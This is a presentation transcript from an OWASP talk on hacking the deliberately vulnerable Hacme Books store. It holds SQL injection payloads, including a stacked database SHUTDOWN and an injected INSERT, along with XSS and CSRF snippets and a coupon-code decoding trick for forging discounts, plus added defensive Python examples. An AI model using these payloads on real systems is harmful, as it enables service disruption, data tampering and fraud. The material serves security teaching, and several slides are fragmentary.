Hacking an eCommerce Site

Presentation transcript for "Hacking an eCommerce Site":

1 Hacking an eCommerce Site
Practical Examples of Hacking an eCommerce Site. Mateo Martínez, QSA, CISSP, OWASP Uruguay

2 OWASP Vulnerable Web Applications Directory Project
Get out of Jail!

Offline: The following list references downloadable vulnerable web applications to play with that can be installed on a standard operating system (Linux, Windows, Mac OS X, etc.) using a standard web platform (Apache/PHP, Tomcat/Java, IIS/.NET, etc.).
The BodgeIt Store (Java)
OWASP Bricks (PHP)
The ButterFly Security Project (PHP)
bWAPP - an extremely buggy web application! (PHP)
Damn Vulnerable Web Application - DVWA (PHP)
Damn Vulnerable Web Services - DVWS (PHP)
OWASP Hackademic Challenges Project (PHP)
Google Gruyere (Python)
Hacme Bank (.NET)
Hacme Books (Java)
Hacme Casino (Ruby on Rails)
Hacme Shipping (ColdFusion)
Hacme Travel (C++)
OWASP Insecure Web App Project (Java, orphaned)
Mutillidae (PHP)
OWASP .NET Goat (C#)
Peruggia (PHP)
Puzzlemall (Java)
Stanford Securibench (Java) & Securibench Micro
SQLI-labs (PHP)
SQLol (PHP)
OWASP Vicnum Project (Perl & PHP)
VulnApp (.NET)
WackoPicko (PHP)
OWASP WebGoat (Java)
OWASP ZAP WAVE - Web Application Vulnerability Examples (Java)
Wavsep - Web Application Vulnerability Scanner Evaluation Project (Java)
WIVET - Web Input Vector Extractor Teaser

Virtual Machines (VMs) or ISO images: The following list references preinstalled and ready-to-use virtual machines (VMs) or ISO images that contain one or multiple vulnerable web applications to play with.
BadStore (ISO, registration required)
Bee-Box (bWAPP VMware)
OWASP BWA - Broken Web Applications Project (VMware, list)
Drunk Admin Web Hacking Challenge (VMware)
Exploit.co.il Vuln Web App (VMware)
GameOver (VMware)
Hackxor (VMware)
Hacme Bank Prebuilt VM (VMware)
Kioptrix4 (VMware & Hyper-V)
LAMPSecurity (VMware)
Metasploitable (VMware, torrent)
Metasploitable 2 (VMware)
Moth (VMware)
PentesterLab - The Exercises (ISO & PDF)
PHDays I-Bank (VMware)
Samurai WTF (ISO, list)
Sauron (QEMU) [Spanish]
UltimateLAMP (VMware, list)
Virtual Hacking Lab (ZIP)
Web Security Dojo (VMware, VirtualBox, list)

Online/Live: The following list references online and live vulnerable web applications available on the Internet to play with.
Acunetix (Forum - ASP; Blog - .NET; Art shopping - PHP)
Cenzic CrackMeBank
Google Gruyere (Python)
Hacking-Lab (e.g. OWASP Top 10)
Hack.me (beta)
HackThisSite (HTS - Basic & Realistic (web) Missions)
Hackxor online demo (algo/smurf)
HP/SpiDynamics Free Bank Online (admin/admin)
IBM/Watchfire AltoroMutual (jsmith/Demo1234)
NTOSpider Web Scanner Test Site (testuser/testpass)
OWASP Hackademic Challenges Project - Live (PHP - Joomla)
Pentester Academy

3 HackPack v1.0: Hacme Bank - Android v1.0, Hacme Bank v2.0, Hacme Books, Hacme Casino v1.0, Hacme Shipping, Hacme Travel
Hacme Bank™ Android is designed to teach mobile application developers, programmers, architects and security professionals how to create secure software and evaluate their own software to identify vulnerabilities. Hacme Bank™ is designed to teach application developers, programmers, architects and security professionals how to create secure software. Foundstone Hacme Books is a learning platform for secure software development. Foundstone Hacme Casino™ is a learning platform for secure software development. Hacme Shipping is a web-based shipping application developed to demonstrate common web application hacking techniques. Hacme Travel is designed to create secure software.

4 #1 Error Generation

5 “ ’ ”

6 stack trace

7 “ ’ ”
• Database type – Hypersonic SQL (org.hsqldb)
• Application server – Apache Tomcat
• Uses the Spring framework
• J2EE application – Java namespaces

8 #2 SQL Injection (a)

9 Command to halt the database server in HSQLDB:
SHUTDOWN

10 Command to halt the database server in HSQLDB:
SHUTDOWN

11 select * from products where title like '%texto_del_usuario%' and like '%otro_texto_del_usuario%'

12 select * from products where title like '%'; SHUTDOWN; --%' and like '%otro_texto_del_usuario%'

13 #2 SQL Injection (b)

14 my feedback', 735); insert into products (title, description, popularity, price, vendor, category, publisher, isbn, author, imgurl, quantity) values ('Eat my shorts you pointy haired boss','A great book',4,29.95,'Amazon','Technical','Addison Wesley',' ','Disgruntled Employee',' --
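As an added example (not from the talk and not Hacme Books code), the two ways of building the search query from slides 11 and 12 side by side: the string concatenation that lets the `'; SHUTDOWN; --` search text (slide 12) and the feedback payload (slide 14) change the statement, and the bound-parameter form that keeps such input as plain text. SQLite is assumed as a stand-in for HSQLDB and the product table is constructed for the example.

```python
import sqlite3

# Constructed stand-in catalogue; the real Hacme Books runs on HSQLDB, where
# a stacked "; SHUTDOWN; --" in the search string halts the database.
PRODUCTS = [
    ("Eat my shorts you pointy haired boss", "A great book"),
    ("Secure Coding in Java", "Validation and output encoding"),
    ("Web Application Security", "Sessions, CSRF and more"),
]

def open_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("create table products (title text, description text)")
    conn.executemany("insert into products values (?, ?)", PRODUCTS)
    return conn

def search_vulnerable(conn, text, other):
    # Same construction as the slide: user text is spliced into the SQL string,
    # so quotes, wildcards and comment markers become part of the query.
    sql = ("select title from products where title like '%" + text + "%' "
           "and description like '%" + other + "%'")
    try:
        return [row[0] for row in conn.execute(sql)]
    except (sqlite3.Warning, sqlite3.ProgrammingError):
        # sqlite3 refuses to run a second, stacked statement; HSQLDB did not.
        return None

def like_pattern(text):
    # Escape LIKE metacharacters so input cannot widen the match either.
    escaped = text.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    return "%" + escaped + "%"

def search_safe(conn, text, other):
    # Bound parameters: the driver passes the values separately from the SQL,
    # so "'; SHUTDOWN; --" is only ever compared against titles as text.
    sql = ("select title from products where title like ? escape '\\' "
           "and description like ? escape '\\'")
    params = (like_pattern(text), like_pattern(other))
    return [row[0] for row in conn.execute(sql, params)]

if __name__ == "__main__":
    db = open_db()
    print(search_vulnerable(db, "'; SHUTDOWN; --", ""))
    print(search_safe(db, "'; SHUTDOWN; --", ""))
    print(search_safe(db, "shorts", "great"))
```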

15 #3 XSS (Cross-Site Scripting)

16 <script>alert("XSS")</script>

17 You should buy our latest bestseller instead of this book.
<script> location=" </script>

18 #4 CSRF (Cross-Site Request Forgery)

19 You should really consider purchasing the latest bestseller.
<img src= height="1"/>

20 #5 Crypto

21 15% discount: AEODBOBOOF. 25% discount: BEAAABBOOF, BEOABDBOOF

22 AEODBOBOOF BEAAABBOOF BEOABDBOOF
BEAAAB2006 BEOABD2006

23 Try this coupon: IEODBOBOAD
% Month Day Year: IE OD BO BOAD
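An added example (not part of the talk): a decoder for the coupon layout shown on slide 23, assuming the letter-for-digit mapping A..I = 1..9 and O = 0, which fits the page's own pairs (AE = 15, BOOF = 2006), followed by the server-side alternative: a coupon carrying an HMAC tag that the store verifies, so its discount and expiry fields cannot be rewritten by the client. The HMAC scheme, function names and demo secret are assumptions, not Hacme Books code.

```python
import hashlib
import hmac

# Letter-for-digit substitution inferred from the slide's pairs (AE -> 15,
# BOOF -> 2006): A..I stand for 1..9 and O for 0. Assumption, not a
# documented Hacme Books fact.
LETTER_TO_DIGIT = {chr(ord("A") + i): str(i + 1) for i in range(9)}
LETTER_TO_DIGIT["O"] = "0"

def decode_coupon(code):
    """Split a 10-letter coupon into (percent, month, day, year) as slide 23 does."""
    digits = "".join(LETTER_TO_DIGIT[c] for c in code.upper())
    return int(digits[0:2]), int(digits[2:4]), int(digits[4:6]), int(digits[6:10])

# An encoding anyone can reverse can be re-encoded with a larger discount.
# The remedy is a secret the client never sees: the store tags each coupon
# with an HMAC and rejects any coupon whose tag does not match.
DEMO_SECRET = b"constructed-demo-secret-keep-server-side"

def _tag(secret, payload):
    # 16 hex chars (64 bits) keeps codes typeable; guessing stays infeasible
    # online when redemption attempts are rate-limited.
    return hmac.new(secret, payload.encode(), hashlib.sha256).hexdigest()[:16]

def issue_coupon(secret, percent, expires):
    """expires is 'YYYYMMDD'; only the server holds the secret to issue coupons."""
    payload = f"{percent:02d}-{expires}"
    return f"{payload}-{_tag(secret, payload)}"

def verify_coupon(secret, coupon, today):
    """Return the discount percent if authentic and unexpired, else None."""
    parts = coupon.split("-")
    if len(parts) != 3:
        return None
    percent, expires, tag = parts
    expected = _tag(secret, f"{percent}-{expires}")
    if not hmac.compare_digest(tag.encode(), expected.encode()):
        return None
    # YYYYMMDD strings compare chronologically, so no date parsing is needed.
    if not (expires.isdigit() and len(expires) == 8 and today <= expires):
        return None
    return int(percent)
```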

24 #6 Broken Access Control

25

26 Hacme Books

27 Thank you very much! mateo.martinez@owasp.org
